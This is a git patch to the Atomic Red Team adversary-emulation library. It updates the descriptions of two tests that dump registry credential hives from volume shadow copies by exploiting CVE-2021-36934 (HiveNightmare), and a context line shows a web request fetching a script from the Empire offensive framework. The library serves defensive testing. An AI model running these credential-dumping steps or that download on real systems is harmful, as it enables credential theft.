From 2a798d98d14c162c3a61bac20f5bb6ed6676144e Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Thu, 10 Nov 2022 16:59:20 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 6 +++--- atomics/T1003.002/T1003.002.md | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f62168ed..f1999bc9 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -73867,8 +73867,8 @@ credential-access: - name: dump volume shadow copy hives with certutil auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7 description: | - Dump hives from volume shadow copies with the certutil utility - This can be done with a non-admin user account + Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". + This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934) supported_platforms: - windows input_arguments: @@ -73899,7 +73899,7 @@ credential-access: rm $toremove -ErrorAction Ignore - name: dump volume shadow copy hives with System.IO.File auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 - description: 'Dump hives from volume shadow copies with System.IO.File + description: 'Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934) ' supported_platforms: diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 9f16954b..ba90b85b 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -224,8 +224,8 @@ Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1b
## Atomic Test #5 - dump volume shadow copy hives with certutil -Dump hives from volume shadow copies with the certutil utility -This can be done with a non-admin user account +Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". +This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934) **Supported Platforms:** Windows @@ -270,7 +270,7 @@ rm $toremove -ErrorAction Ignore
## Atomic Test #6 - dump volume shadow copy hives with System.IO.File -Dump hives from volume shadow copies with System.IO.File +Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934) **Supported Platforms:** Windows